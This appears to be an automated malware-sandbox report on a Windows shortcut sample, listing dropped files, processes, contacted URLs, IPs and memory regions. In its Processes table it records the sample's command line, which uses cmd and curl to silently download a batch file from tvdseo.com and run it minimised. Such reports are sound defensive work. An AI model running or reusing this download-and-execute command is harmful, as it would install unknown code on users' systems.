Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
document.lnk.download.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=13, Archive, ctime=Sun Nov 19 08:21:59 2023, mtime=Tue Oct 1 09:54:59 2024, atime=Sun Nov 19 08:21:59 2023, length=236544,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\Public\UDkXtQleTB.bat
|
HTML document, Unicode text, UTF-8 text, with very long lines (4512), with CRLF, LF line terminators
|
dropped
|
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\SysWOW64\cmd.exe" /c curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat & start /min C:\Users\Public\UDkXtQleTB.bat
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
C:\Windows\system32\cmd.exe /K C:\Users\Public\UDkXtQleTB.bat
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\curl.exe
|
curl -s -o C:\Users\Public\UDkXtQleTB.bat https://tvdseo.com/file/quan.bat
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.19.4
|
unknown
|
|
|
|
https://tvdseo.com/wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6
|
unknown
|
|
|
|
https://tvdseo.com/file/quan.batS
|
unknown
|
|
|
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=9.4.1
|
unknown
|
|
|
|
https://tvdseo.com/dich-vu-seo-app-chplay/
|
unknown
|
|
|
|
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.19.4
|
unknown
|
|
|
|
https://tvdseo.com/about/
|
unknown
|
|
|
|
https://tvdseo.com/dich-vu-seo-app-store-ios/
|
unknown
|
|
|
|
https://tvdseo.com/comments/feed/
|
unknown
|
|
|
|
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/screen.min.css?ver=2411
|
unknown
|
|
|
|
https://tvdseo.com/
|
unknown
|
|
|
|
https://tvdseo.com/file/quan.bat
|
104.21.81.137
|
|
|
|
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3ROp8l
|
unknown
|
||
|
https://www.google.com/recaptcha/api.js?render=6LdvsEcqAAAAACGxQQMlRM5ahTlqMCdLjESH279L&ver=3.0
|
unknown
|
||
|
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwaPGR_p.woff2)
|
unknown
|
||
|
https://tvdseo.com/file/quan.batD
|
unknown
|
||
|
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjxAwXjeu.woff2)
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.19.4)
|
unknown
|
||
|
https://tvdseo.com/wp-content/fonts/lato/S6u9w4BMUTPHh6UVSwiPGQ.woff2)
|
unknown
|
||
|
https://tvdseo.com/category/phan-mem/
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-270x270.png
|
unknown
|
||
|
https://gravatar.com/dungk396
|
unknown
|
||
|
https://tvdseo.com/url-short-short-link/
|
unknown
|
||
|
https://tvdseo.com/wp-content/fonts/dancing-script/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Rep8l
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-tiktok/
|
unknown
|
||
|
https://tvdseo.com/p/tool-multi-zalo-su-dung-nhieu-zalo-tren-may-tinh/
|
unknown
|
||
|
https://tvdseo.com/app/ShemaTuyenDung.php
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-shop-lazada/
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/js/chunk.slider.js?ver=3.19.4
|
unknown
|
||
|
https://tvdseo.com/wp-content/fonts/lato/S6uyw4BMUTPHjx4wXg.woff2)
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Bold.ttf
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.19.4#fl-icons)
|
unknown
|
||
|
https://news.google.com/publications/CAAqBwgKMP6toQswlri5Aw?hl=vi&gl=VN&ceid=VN%3Avi
|
unknown
|
||
|
https://tvdseo.com/cart-2/
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js?ver=9.4
|
unknown
|
||
|
https://schema.org
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-32x32.png
|
unknown
|
||
|
http://www.dmca.com/Protection/Status.aspx?ID=502286c4-db26-4ff5-898e-3899d9fd8507
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/style.css?ver=3.19.4
|
unknown
|
||
|
https://tvdseo.com/remove-background-xoa-nen-anh-free/
|
unknown
|
||
|
https://tvdseo.com/#organization
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=325ad20e90dbc8889310
|
unknown
|
||
|
https://tvdseo.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-youtube/
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/js/kk-star-ratings.min.js?ver=
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/flatsome.css?ver=3.19.4
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/table-of-contents-plus/front.min.js?ver=2411
|
unknown
|
||
|
https://tvdseo.com/category/tin-hoc-ab/
|
unknown
|
||
|
https://tvdseo.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-shop-tmdt/
|
unknown
|
||
|
https://tvdseo.com/file/quan.bate
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff2?v=3.19.4)
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.js?ver=9.
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2023/03/LOGO_TVD_SEO_PRO-removebg-1-510x213.png
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/kk-star-ratings/src/core/public/css/kk-star-ratings.min.css?ve
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-192x192.png
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/contact-form-7/modules/recaptcha/index.js?ver=6.0
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt
|
unknown
|
||
|
https://tvdseo.com/xmlrpc.php
|
unknown
|
||
|
https://images.dmca.com/badges/dmca.css?ID=502286c4-db26-4ff5-898e-3899d9fd8507
|
unknown
|
||
|
https://www.dmca.com/Protection/Status.aspx?id=502286c4-db26-4ff5-898e-3899d9fd8507&refurl=https
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.19.4)
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.19.4)
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/js/tvdseo.js
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.0
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/js/flatsome.js?ver=8e60d746741250b4dd4e
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/inc/extensions/flatsome-live-search/flatsome-live-sear
|
unknown
|
||
|
https://tvdseo.com/xmlrpc.php?rsd
|
unknown
|
||
|
https://yoast.com/wordpress/plugins/seo/
|
unknown
|
||
|
https://tvdseo.com/iq-vo-cuc/
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/wp-consent-api-integration.min.
|
unknown
|
||
|
https://tvdseo.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2023/03/cropped-LOGO-TVD-SEO-VUONG.png
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2023/03/cropped-cropped-LOGO-TVD-SEO-VUONG-180x180.png
|
unknown
|
||
|
https://gmpg.org/xfn/11
|
unknown
|
||
|
https://congdonginan.vn/
|
unknown
|
||
|
https://tvdseo.com/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.19.4);
|
unknown
|
||
|
https://tvdseo.com/#website
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-instagram/
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-facebook/
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2022/01/LOGO_TVD_SEO_VUONG-removebg.png
|
unknown
|
||
|
https://tvdseo.com/category/thongtinhay/
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d64
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=9.4.1
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-fanpage/
|
unknown
|
||
|
https://tvdseo.com/my-account-2/
|
unknown
|
||
|
https://tvdseo.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
|
unknown
|
||
|
https://www.google.com/maps/embed?pb=
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/wp-consent-api/assets/js/wp-consent-api.min.js?ver=1.0.7
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-google-map/
|
unknown
|
||
|
https://api.w.org/
|
unknown
|
||
|
https://tvdseo.com/#/schema/logo/image/
|
unknown
|
||
|
https://tvdseo.com/dich-vu-seo-shop-shoppe/
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4-wc.
|
unknown
|
||
|
https://www.youtube.com/channel/UCUZToD8MAs4MWywND_9DStg
|
unknown
|
||
|
https://tvdseo.com/wp-content/uploads/2024/09/GoogleSans-Regular.ttf
|
unknown
|
||
|
https://tvdseo.com/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
tvdseo.com
|
104.21.81.137
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.81.137
|
tvdseo.com
|
United States
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3668000
|
heap
|
page read and write
|
||
|
3620000
|
heap
|
page read and write
|
||
|
3655000
|
heap
|
page read and write
|
||
|
366A000
|
heap
|
page read and write
|
||
|
3664000
|
heap
|
page read and write
|
||
|
32FD000
|
stack
|
page read and write
|
||
|
363A000
|
heap
|
page read and write
|
||
|
35F0000
|
remote allocation
|
page read and write
|
||
|
3655000
|
heap
|
page read and write
|
||
|
3663000
|
heap
|
page read and write
|
||
|
3638000
|
heap
|
page read and write
|
||
|
38F0000
|
heap
|
page read and write
|
||
|
35F0000
|
remote allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
363C000
|
heap
|
page read and write
|
||
|
3693000
|
heap
|
page read and write
|
||
|
3628000
|
heap
|
page read and write
|
||
|
2FED000
|
stack
|
page read and write
|
||
|
3350000
|
heap
|
page read and write
|
||
|
35F0000
|
remote allocation
|
page read and write
|
||
|
3655000
|
heap
|
page read and write
|
||
|
3639000
|
heap
|
page read and write
|
||
|
367A000
|
heap
|
page read and write
|
||
|
3667000
|
heap
|
page read and write
|
||
|
3637000
|
heap
|
page read and write
|
||
|
39FF000
|
stack
|
page read and write
|
||
|
3663000
|
heap
|
page read and write
|
||
|
346E000
|
stack
|
page read and write
|
||
|
362F000
|
heap
|
page read and write
|
||
|
3693000
|
heap
|
page read and write
|
||
|
3693000
|
heap
|
page read and write
|
||
|
3633000
|
heap
|
page read and write
|
||
|
34C0000
|
heap
|
page read and write
|
||
|
34B0000
|
heap
|
page read and write
|
||
|
367A000
|
heap
|
page read and write
|
||
|
34E5000
|
heap
|
page read and write
|
||
|
385E000
|
stack
|
page read and write
|
||
|
363A000
|
heap
|
page read and write
|
||
|
35EF000
|
stack
|
page read and write
|
||
|
34AE000
|
stack
|
page read and write
|
||
|
381F000
|
stack
|
page read and write
|
||
|
3630000
|
heap
|
page read and write
|
||
|
3633000
|
heap
|
page read and write
|
There are 33 hidden memdumps, click here to show them.